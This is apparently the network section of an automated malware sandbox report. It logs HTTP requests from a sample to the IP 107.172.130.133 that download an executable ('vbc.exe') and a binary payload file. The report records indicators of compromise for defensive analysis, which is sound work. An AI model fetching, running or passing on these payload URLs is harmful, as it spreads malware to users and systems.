Network Analysis
IP Address | Status | Action |
---|---|---|
107.172.130.133 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
GET
200
http://107.172.130.133/62/vbc.exe
REQUEST
RESPONSE
BODY
GET /62/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 107.172.130.133
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 23 May 2023 08:13:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 21 May 2023 17:44:25 GMT
ETag: "696a8-5fc37b489e755"
Accept-Ranges: bytes
Content-Length: 431784
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://107.172.130.133/e/cLItriJACP41.bin
REQUEST
RESPONSE
BODY
GET /e/cLItriJACP41.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Host: 107.172.130.133
HTTP/1.1 200 OK
Date: Tue, 23 May 2023 08:14:20 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 21 May 2023 17:43:07 GMT
ETag: "7640-5fc37afddff0b"
Accept-Ranges: bytes
Content-Length: 30272
Content-Type: application/octet-stream
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts